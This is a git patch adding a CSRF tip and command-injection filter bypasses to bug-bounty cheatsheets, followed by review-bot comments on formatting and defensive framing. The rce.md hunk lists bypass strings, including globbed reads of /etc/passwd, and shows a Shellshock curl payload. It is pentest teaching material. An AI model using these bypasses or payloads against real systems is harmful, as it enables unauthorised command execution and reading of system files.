From 62b8a6623bc4984cd850d4703c65717456252694 Mon Sep 17 00:00:00 2001 From: Kuromatae Date: Mon, 28 Oct 2019 14:30:57 +0100 Subject: [PATCH 1/2] Update bugbountytips.md Added tip #7 --- cheatsheets/bugbountytips.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cheatsheets/bugbountytips.md b/cheatsheets/bugbountytips.md index ae268db..d678d96 100644 --- a/cheatsheets/bugbountytips.md +++ b/cheatsheets/bugbountytips.md @@ -29,3 +29,10 @@ Look for *hackathon-related* assets. What I mean by this is sometimes companies **Tip #6** Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/ + + + +**Tip #7** + +When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. +For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim. From 71007f84c8ec00a3115146deadc093ca35bfb1fb Mon Sep 17 00:00:00 2001 From: Kuromatae Date: Mon, 28 Oct 2019 14:54:49 +0100 Subject: [PATCH 2/2] Update rce.md Added some bypasses --- cheatsheets/rce.md | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 66d39cf..7ddfc73 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -10,6 +10,27 @@ strŅ–ng If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. +**Basic Bypasses** + +``` +i'''d +i"""d +``` + +``` +\l\s -l\a\h +``` + +``` +cat /e?c/p?ss?? +cat /e??/??ss* +``` + +``` +{ls,} +{ls,-a} +``` + **Shellshock Bug** ```bash 
@@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru ```zsh curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ -``` \ No newline at end of file +```
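Review bot: The new Tip #7 in the bugbountytips.md hunk tells the reader what to try but never names the finding it establishes; suggest adding one sentence stating that the underlying weakness is the server performing a state-changing action on a GET request (no request-method enforcement), since that is what turns a CSRF from "send the victim a link" into a plain `[img]` load, and it is the fact worth reporting next to the CSRF itself. Two smaller points: the hunk inserts three consecutive blank lines before `**Tip #7**`, which is more than the single blank line separating `**Tip #6**` from its own text in the context above, so trim to match; and "improve the CVSS score" reads oddly from the reporter's side, "raise" is clearer.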
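Review bot: The "Basic Bypasses" block added to rce.md lists eight command strings with no statement of what each one bypasses, so a reader cannot tell what the section is for or how to use it when testing their own filters; suggest one line per block naming the shell feature each relies on (quote removal for `i'''d` / `i"""d`, backslash escaping for `\l\s -l\a\h`, glob expansion for the `?`/`*` forms, brace expansion for `{ls,}`), plus the defensive conclusion that these only matter where user input reaches a shell and a keyword blacklist is the sole control, so the fix is to avoid shell invocation or to allowlist, not to extend the blacklist. Also, all four new fences are untagged while the neighbouring blocks in the same file use ```bash and ```zsh; tag them ```bash so the sheet renders consistently.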
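Review bot: The second rce.md hunk only adds the missing newline after the closing fence of the Shellshock example; that is a good fix but is unrelated to the "Added some bypasses" commit subject, so either mention it in the message or split it into its own commit. While touching that block, note that the fence is tagged ```zsh although the `curl` invocation is shell-agnostic and the file's other example is tagged ```bash; using ```bash here too would keep the tags consistent.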